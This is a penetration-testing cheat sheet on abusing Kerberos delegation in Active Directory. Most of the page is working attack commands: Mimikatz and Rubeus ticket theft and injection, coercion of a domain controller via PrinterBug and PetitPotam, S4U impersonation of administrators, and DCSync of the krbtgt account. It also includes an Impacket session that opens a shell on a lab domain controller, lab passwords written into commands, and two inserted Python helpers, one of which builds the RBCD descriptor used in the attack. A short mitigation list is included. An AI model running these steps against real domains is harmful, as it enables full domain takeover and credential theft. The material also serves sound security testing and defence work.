# Trustee and Resource Delegation

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

{% embed url="<https://www.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory/>" %}

{% embed url="<https://labs.f-secure.com/archive/trust-years-to-earn-seconds-to-break/>" %}

{% embed url="<https://www.guidepointsecurity.com/blog/delegating-like-a-boss-abusing-kerberos-delegation-in-active-directory/>" %}

## Delegations

{% embed url="<https://github.com/TheManticoreProject/Delegations>" %}

## ADeleginator

{% embed url="<https://github.com/techspence/ADeleginator>" %}

## NXC

```
nxc ldap 192.168.56.11 -u eddard.stark -p FightP3aceAndHonor! --find-delegation
```

<figure><img src="/files/dNqJPKBoaPFDj41Ilyaq" alt=""><figcaption></figcaption></figure>

<https://x.com/al3x_n3ff/status/1857153795949559875?t=3iN0A-aTMN58zD0O7rIIlA&s=03>

## SharpADWS

{% embed url="<https://github.com/wh0amitz/SharpADWS>" %}

## Unconstrained Delegation

**Unconstrained Delegation:** allows the first-hop server to request access to any service on any computer in the domain. Every account that authenticates to it with Kerberos leaves a copy of its TGT in the server's LSASS memory, and that cached TGT is what gets stolen below.

{% embed url="<http://www.labofapenetrationtester.com/2016/02/getting-domain-admin-with-kerberos-unconstrained-delegation.html>" %}

{% embed url="<https://adsecurity.org/?p=1667>" %}

### Discovery

* PowerView

```powershell
Get-DomainComputer -UnConstrained
```

* AD Module

```powershell
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
```

### Compromise the server where unconstrained delegation is enabled

Wait for a DA to connect, then export the cached tickets (local admin on the server is required):

```powershell
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
```

### Reuse the DA TGT

```powershell
Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\[****]-*****-Administrator@krbtgt-DOMAIN.LOCAL.kirbi"'
```

### Trick a privileged account into connecting to the machine with Unconstrained Delegation: Printer Bug

{% content-ref url="/pages/FPIbdosGSrSHYzhw5i4w" %}
[Misconfiguration](/0xss0rz/pentest/internal-pentest/misconfiguration.md)
{% endcontent-ref %}

{% content-ref url="/pages/cTCsQDwQ23z6bHQN0fbR" %}
[Print Spooler](/0xss0rz/pentest/internal-pentest/print-spooler.md)
{% endcontent-ref %}

{% embed url="<https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn>" %}

{% hint style="success" %}
*Printerbug also works across a Two-way forest trust with TGT Delegation enabled - See* [*Trusts*](/0xss0rz/pentest/internal-pentest/trusts.md)
{% endhint %}

Capture the TGT of `dc$` (the DC machine account) by running Rubeus on the compromised unconstrained-delegation server

```powershell
Rubeus.exe monitor /interval:5 /nowrap
```

Printerbug - Run MS-RPRN.exe

{% embed url="<https://github.com/leechristensen/SpoolSample>" %}

{% embed url="<https://github.com/jtmpu/PrecompiledBinaries/blob/master/SpoolSample.exe>" %}

```powershell
# Victim host (unconstrained delegation server): start listening first
Rubeus.exe monitor /interval:5 /nowrap

# Then trigger the coercion: <target to coerce> <host that will receive the authentication>
MS-RPRN.exe \\dc.domain.local \\victim.domain.local
```

Or with PetitPotam

{% embed url="<https://github.com/topotam/PetitPotam>" %}

```powershell
# Victim host: start listening first
Rubeus.exe monitor /interval:5 /nowrap

# PetitPotam.exe <listener that receives the authentication> <target to coerce>
.\PetitPotam.exe victim.domain.local dc.domain.local
```

On Linux, use Coercer

{% content-ref url="/pages/3jW53CaRXMUs4f8szugL" %}
[SMB (445, 139) / RPC](/0xss0rz/pentest/protocols/smb-445-139-rpc.md)
{% endcontent-ref %}

ShadowCoerce or DFSCoerce can also be used

{% embed url="<https://github.com/ShutdownRepo/ShadowCoerce>" %}

{% embed url="<https://github.com/Wh04m1001/DFSCoerce>" %}

Copy the base64-encoded TGT printed by Rubeus monitor and remove the extra spaces/line breaks before using it

```powershell
Rubeus.exe ptt /ticket:<Base64>
```

Or use Invoke-Mimikatz:

```powershell
# Write the base64 ticket from Rubeus monitor to a .kirbi file, then inject it
[IO.File]::WriteAllBytes("C:\AD\Tools\dc.kirbi", [Convert]::FromBase64String("<ticket_from_Rubeus_monitor>"))
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\dc.kirbi"'
```

Run DCSync

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
```

{% content-ref url="/pages/xnKTwmiIoj8HdMcJZAjp" %}
[DCSync](/0xss0rz/pentest/internal-pentest/dcsync.md)
{% endcontent-ref %}

### Mitigation

The following security controls should be implemented to mitigate unconstrained delegation:

* **Ensure computer objects are not configured for unconstrained delegation.** If delegation is required for a computer object, use resource-based constrained delegation instead.
* **Ensure privileged user objects are configured as ‘sensitive and cannot be delegated’.** This can be configured by using the ‘Account is sensitive and cannot be delegated’ option on the user object in Active Directory Users and Computers.
* **Ensure privileged user objects are members of the** [**Protected Users security group**](https://learn.microsoft.com/en-au/windows-server/security/credentials-protection-and-management/protected-users-security-group)**.** Members of this security group cannot be delegated.
* **Disable the Print Spooler service on Domain Controllers.** This prevents the Print Spooler service from being used to coerce a Domain Controller into authenticating to another system.

<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03>

## Constrained Delegation - Protocol Transition

**Constrained Delegation:** allows the first-hop server to request access only to the services (SPNs) listed in its `msDS-AllowedToDelegateTo` attribute

**Service for User (S4U):** Kerberos extensions (MS-SFU) used to impersonate a user without knowing the user's credentials

**S4U2self:** lets a service obtain a service ticket to itself on behalf of any user; the ticket is forwardable only when the account has `TRUSTED_TO_AUTH_FOR_DELEGATION` set (protocol transition, "use any authentication protocol")

**S4U2proxy:** lets the service use that ticket to obtain a service ticket to a second service on behalf of the user; `msDS-AllowedToDelegateTo` contains the list of SPNs the ticket can be forwarded to

### Discovery

* PowerView

```powershell
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
```

* AD Module

```powershell
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
```
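The PowerView and AD-module one-liners in the Unconstrained Delegation and Constrained Delegation discovery sections above all filter on the same attributes: `userAccountControl` bits, `msDS-AllowedToDelegateTo` and `msDS-AllowedToActOnBehalfOfOtherIdentity`. The following Python example (added here, not from this page nor from PowerView or the AD module) classifies constructed LDAP objects into the delegation types described on this page, including the Kerberos-only case from the last section, and flags accounts that cannot be impersonated through S4U (`NOT_DELEGATED` or Protected Users, the two mitigations listed above). All account names and values are constructed sample data; the `LDAP_FILTERS` entries are the equivalent raw LDAP filters you can feed to any LDAP client.

```python
# Added example (not from this page): classify delegation settings from LDAP
# attributes, the same bits PowerView / the AD module filter on.
# All sample objects below are constructed for illustration.

# userAccountControl bits (MS-ADTS 2.2.16)
UF_SERVER_TRUST_ACCOUNT = 0x2000               # domain controller
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition: S4U2self ticket is forwardable

PROTECTED_USERS_CN = "CN=Protected Users,"

# Raw LDAP filters equivalent to the PowerView / AD-module discovery commands
LDAP_FILTERS = {
    "unconstrained (non-DC)": "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)"
                              "(!(userAccountControl:1.2.840.113556.1.4.803:=8192)))",
    "constrained": "(msDS-AllowedToDelegateTo=*)",
    "rbcd": "(msDS-AllowedToActOnBehalfOfOtherIdentity=*)",
}


def classify(obj):
    """Return the delegation findings for one LDAP object given as a dict of attributes."""
    uac = int(obj.get("userAccountControl", 0))
    allowed_to = obj.get("msDS-AllowedToDelegateTo", [])
    findings = []
    if uac & UF_TRUSTED_FOR_DELEGATION:
        if uac & UF_SERVER_TRUST_ACCOUNT:
            findings.append("unconstrained (domain controller, expected)")
        else:
            findings.append("unconstrained")
    if allowed_to:
        targets = ", ".join(allowed_to)
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            findings.append("constrained with protocol transition: " + targets)
        else:
            # No protocol transition: S4U2self gives a non-forwardable ticket,
            # so S4U2proxy needs a forwardable evidence ticket from elsewhere (e.g. RBCD)
            findings.append("constrained, Kerberos only: " + targets)
    if obj.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        findings.append("rbcd: msDS-AllowedToActOnBehalfOfOtherIdentity set")
    return findings


def can_be_impersonated(obj):
    """False when S4U on behalf of this user is blocked: NOT_DELEGATED flag or Protected Users."""
    uac = int(obj.get("userAccountControl", 0))
    if uac & UF_NOT_DELEGATED:
        return False
    if any(dn.startswith(PROTECTED_USERS_CN) for dn in obj.get("memberOf", [])):
        return False
    return True


def delegation_report(objects):
    """Map sAMAccountName -> findings, skipping objects with no delegation configured."""
    report = {}
    for obj in objects:
        findings = classify(obj)
        if findings:
            report[obj["sAMAccountName"]] = findings
    return report


# Constructed sample objects (values chosen to mirror the cases on this page)
SAMPLE_OBJECTS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x81000},
    {"sAMAccountName": "appsvc", "userAccountControl": 0x1000200,
     "msDS-AllowedToDelegateTo": ["CIFS/mssql.domain.local"]},
    {"sAMAccountName": "victim$", "userAccountControl": 0x1000,
     "msDS-AllowedToDelegateTo": ["time/dc.domain.local", "ldap/dc.domain.local"]},
    {"sAMAccountName": "mssql$", "userAccountControl": 0x1000,
     # truncated stand-in: any non-empty security descriptor means trustees are set
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80"},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x100200},
    {"sAMAccountName": "da.user", "userAccountControl": 0x200,
     "memberOf": ["CN=Protected Users,CN=Users,DC=domain,DC=local"]},
]

if __name__ == "__main__":
    for sam, findings in delegation_report(SAMPLE_OBJECTS).items():
        print(sam, "->", "; ".join(findings))
    for obj in SAMPLE_OBJECTS:
        if not can_be_impersonated(obj):
            print(obj["sAMAccountName"], "cannot be impersonated via S4U")
```

Feed the function the attribute dicts returned by your LDAP client (ldap3, Impacket's `ldap` module, or a BloodHound JSON export) instead of `SAMPLE_OBJECTS` to get the same triage on a real domain; DC accounts are reported separately because unconstrained delegation on a DC is the default and not a finding.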

### Abusing with kekeo

The password or NTLM/AES key of the delegating account is required.

1. Request a TGT

```powershell
kekeo# tgt::ask /user:victim_user /domain:domain.local /rc4:<ntlm_hash>
```

2. Request a TGS

```powershell
# Service ticket for a single SPN
kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL

# Same request plus an alternate service (HTTP) on the same host, separated by |
kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL|HTTP/mssql.domain.LOCAL
```

3. Inject the ticket

```powershell
Invoke-Mimikatz -Command '"kerberos::ptt <tgs_from_step_2>.kirbi"'
```

```powershell
ls \\mssql.domain.local\c$
```

```powershell
Invoke-Command -ScriptBlock{whoami} -ComputerName mssql.domain.local
```

### Abusing with Rubeus

Request TGT and TGS in a single command

```powershell
Rubeus.exe s4u /user:victim_user /aes256:<aes_key> /impersonateuser:Administrator /msdsspn:CIFS/mssql.domain.LOCAL /ptt
```

```powershell
ls \\mssql.domain.local\c$
```

{% hint style="success" %}
*The delegation is not limited to the SPN listed in `msDS-AllowedToDelegateTo`: the service name in a service ticket is not validated, so the ticket can be rewritten for any other service running under the same account (Rubeus `/altservice`, kekeo `|`).*
{% endhint %}

With rc4

```powershell
# CIFS is the delegated SPN; /altservice:HTTP rewrites the ticket for WinRM on the same host
Rubeus.exe s4u /user:appsvc /rc4:<ntlm_hash> /impersonateuser:administrator /msdsspn:CIFS/mssql.domain.local /altservice:HTTP /domain:domain.local /ptt

winrs -r:mssql.domain.local cmd.exe
```

### Abusing with kekeo (machine account delegating to the DC)

Same steps with a compromised machine account whose `msDS-AllowedToDelegateTo` points at the DC; the password or NTLM/AES key of the machine account is required.

1. Request a TGT

```powershell
kekeo# tgt::ask /user:victim_machine_account$ /domain:domain.local /rc4:<ntlm_hash>
```

2. Request a TGS

```powershell
kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:time/dc.domain.LOCAL|ldap/dc.domain.LOCAL
```

3. Inject the ticket

```powershell
Invoke-Mimikatz -Command '"kerberos::ptt <tgs_from_step_2>.kirbi"'
```

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
```

### Abusing with Rubeus (machine account delegating to the DC)

Request TGT and TGS in a single command; `time` is the delegated SPN and `/altservice:ldap` rewrites the ticket for DCSync

```powershell
Rubeus.exe s4u /user:victim_machine_account$ /aes256:<aes_key> /impersonateuser:Administrator /msdsspn:time/dc.domain.LOCAL /altservice:ldap /ptt
```

```powershell
SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"
```

### Persistence - msDS-AllowedToDelegateTo

{% content-ref url="/pages/tUeIS9njvbJvwoJzaw5v" %}
[Persistence](/0xss0rz/pentest/internal-pentest/persistence.md)
{% endcontent-ref %}

## Resource-based Constrained Delegation

{% embed url="<https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html>" %}

{% embed url="<https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd>" %}

Instead of listing SPNs in `msDS-AllowedToDelegateTo` on the front-end service, access is controlled by a security descriptor stored in `msDS-AllowedToActOnBehalfOfOtherIdentity` (exposed by the AD module as `PrincipalsAllowedToDelegateToAccount`) on the resource/back-end service itself

The administrator of the resource can configure this delegation, whereas the other types require the `SeEnableDelegationPrivilege` right, held by default only by Domain Admins

**Two things are needed to abuse RBCD:**

1. **Write permission** over the target computer object (enough to write `msDS-AllowedToActOnBehalfOfOtherIdentity`: GenericAll, GenericWrite, WriteDacl, WriteOwner, ...)
2. Control of an account that has an SPN (for instance admin access to a domain-joined machine, or the ability to create a machine account: `ms-DS-MachineAccountQuota` is 10 by default)
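`msDS-AllowedToActOnBehalfOfOtherIdentity` is not a list of names but a binary security descriptor, which is why the AD module wraps it as `PrincipalsAllowedToDelegateToAccount` and why Impacket's `rbcd.py` has to build one. The Python example below (added here; it is not this page's or Impacket's code) builds that descriptor from trustee SIDs in the same layout `rbcd.py` writes (self-relative SD, owner and group `BUILTIN\Administrators`, one `ACCESS_ALLOWED_ACE` with full control per trustee) and parses one read back over LDAP so you can see who is already allowed to act on a resource. The SIDs used are constructed; `add_trustee` exists because a blind `Set-ADComputer`/write of the attribute replaces any trustees that were already there.

```python
# Added example (not from this page): build and parse the security descriptor
# stored in msDS-AllowedToActOnBehalfOfOtherIdentity. Layout follows MS-DTYP
# (self-relative SECURITY_DESCRIPTOR, ACL, ACCESS_ALLOWED_ACE). SIDs are constructed.
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF        # access mask used for the RBCD ACE
ACL_REVISION_DS = 4
BUILTIN_ADMINS = "S-1-5-32-544"  # owner/group of the descriptor


def sid_to_bytes(sid):
    """Encode 'S-1-5-21-...' into binary SID form (MS-DTYP 2.4.2.2)."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("bad SID: " + sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf, off=0):
    """Decode a binary SID at buf[off:]; returns (sid_string, encoded_length)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = [struct.unpack_from("<I", buf, off + 8 + 4 * i)[0] for i in range(count)]
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def build_rbcd_sd(trustee_sids):
    """Self-relative security descriptor whose DACL allows each trustee to act on behalf of other identities."""
    owner = sid_to_bytes(BUILTIN_ADMINS)
    aces = b""
    for sid in trustee_sids:
        sid_b = sid_to_bytes(sid)
        # ACE: type, flags, size, access mask, then the trustee SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    # ACL header: revision, sbz1, total size, ACE count, sbz2
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(trustee_sids), 0) + aces
    off_owner = 20                       # SECURITY_DESCRIPTOR header is 20 bytes
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(owner)    # no SACL, so the DACL follows the group SID
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)
    return header + owner + owner + dacl


def rbcd_trustees(sd):
    """Parse an attribute value read over LDAP and return the SIDs allowed to delegate to the resource."""
    control = struct.unpack_from("<H", sd, 2)[0]
    off_dacl = struct.unpack_from("<I", sd, 16)[0]
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    ace_count = struct.unpack_from("<H", sd, off_dacl + 4)[0]
    pos, trustees = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            trustees.append(sid_from_bytes(sd, pos + 8)[0])
        pos += ace_size
    return trustees


def add_trustee(existing_sd, new_sid):
    """Return a descriptor with new_sid appended, keeping trustees already present."""
    current = rbcd_trustees(existing_sd) if existing_sd else []
    if new_sid not in current:
        current.append(new_sid)
    return build_rbcd_sd(current)


if __name__ == "__main__":
    # constructed SIDs: a fake domain, two computer accounts
    sd = build_rbcd_sd(["S-1-5-21-1-2-3-1105"])
    print(len(sd), sd.hex())
    print(rbcd_trustees(add_trustee(sd, "S-1-5-21-1-2-3-1106")))
```

Write the returned bytes to the attribute with any LDAP client (an `ldap3` `MODIFY_REPLACE`, for instance) once you hold write access to the target object; reading it back with `rbcd_trustees` is also a quick way to audit which accounts are already trusted on a resource, which BloodHound shows as `AllowedToAct` edges.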

### Write Permission

```powershell
Find-InterestingDomainACL | ?{$_.identityreferencename -match 'username'}
```

### Exploit

Configure RBCD

```powershell
$comps = 'computer1$','computer2$'
Set-ADComputer -Identity victim -PrincipalsAllowedToDelegateToAccount $comps
```

Extract AES keys for computerx$

```powershell
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
```

Use the AES key and access victim as ANY user we want

```powershell
Rubeus.exe s4u /user:computer1$ /aes256:<aes_key> /msdsspn:http/victim /impersonateuser:administrator /ptt
```

```powershell
winrs -r:victim cmd.exe
```

### With Impacket

<figure><img src="/files/Bp3t7xCk5eUD4HeIEkLZ" alt=""><figcaption></figcaption></figure>

L.BIANCHI\_ADM is a DA. Here the group `DELEGATEDADMINS` is the trustee configured on `dc01$`, so adding `svc_ldap` to that group and giving it any SPN (S4U2self requires one) is enough to impersonate the DA against `cifs/dc01`

```
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ ./bloodyAD.py --host dc01.domain.htb --dc-ip 10.10.11.45 -d "DOMAIN.HTB" -u user -p 'password' -k add groupMember "DELEGATEDADMINS" "SVC_LDAP"
[+] SVC_LDAP added to DELEGATEDADMINS

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ ./bloodyAD.py --host dc01.domain.htb -d "DOMAIN.HTB" --dc-ip 10.10.11.45 -k set object "SVC_LDAP" servicePrincipalName -v "cifs/fake"
[+] SVC_LDAP's servicePrincipalName has been updated

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-getTGT domain.htb/svc_ldap:password -dc-ip dc01.domain.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in svc_ldap.ccache

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ export KRB5CCNAME=svc_ldap.ccache

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-getST -spn 'cifs/dc01.domain.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'domain.htb/svc_ldap:password'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Impersonating L.BIANCHI_ADM
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-wmiexec -k -no-pass DOMAIN.HTB/L.BIANCHI_ADM@dc01.domain.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type Users\Administrator\Desktop\root.txt
```

## Constrained Delegation - Kerberos Only

With Kerberos-only constrained delegation (no protocol transition), S4U2self returns a non-forwardable ticket, so the S4U2proxy step fails. Leverage RBCD to work around it: configure RBCD on the delegating machine (`victim$`) from an account we control, obtain a forwardable ticket for the target user through that RBCD hop, then use it as the evidence ticket for the Kerberos-only hop to the final target.

### Enumeration

```powershell
# AD Module - list accounts with constrained delegation configured; Kerberos-only ones do not have TRUSTED_TO_AUTH_FOR_DELEGATION in userAccountControl
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo,userAccountControl
```

### Create a new machine account

<https://github.com/Kevin-Robertson/Powermad>

```powershell
. .\Powermad.ps1
New-MachineAccount -MachineAccount studentcompX -Password (ConvertTo-SecureString 'P@ssword@123' -AsPlainText -Force)
```

### Configure RBCD

```powershell
# On the victim host: get a TGT as victim$ (a computer account can write msDS-AllowedToActOnBehalfOfOtherIdentity on its own object)
Rubeus.exe asktgt /user:victim$ /aes256:<aes_key> /domain:domain.local /ptt /nowrap

# With AD Module, using that ticket: allow studentcompX$ to act on behalf of other identities on victim$
Set-ADComputer -Identity victim$ -PrincipalsAllowedToDelegateToAccount studentcompX$ -Verbose
```

### Get TGS

```powershell
# Get the hash of the machine account we created
Rubeus.exe hash /password:P@ssword@123 /user:studentcompX$ /domain:domain.local

# RBCD hop: forwardable service ticket for administrator to victim$
Rubeus.exe s4u /impersonateuser:administrator /user:studentcompX$ /rc4:<rc4_hash> /msdsspn:cifs/victim.domain.local /nowrap
```

### Request a new forwardable TGS

```powershell
# Kerberos-only hop: use the forwardable ticket from the previous step as evidence (/tgs) for victim$'s constrained delegation to mssql
Rubeus.exe s4u /tgs:<base64_tgs_from_previous_step> /user:victim$ /aes256:<victim$_aes> /msdsspn:cifs/mssql.domain.local /altservice:http /nowrap /ptt

winrs -r:mssql.domain.local cmd.exe
```

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)

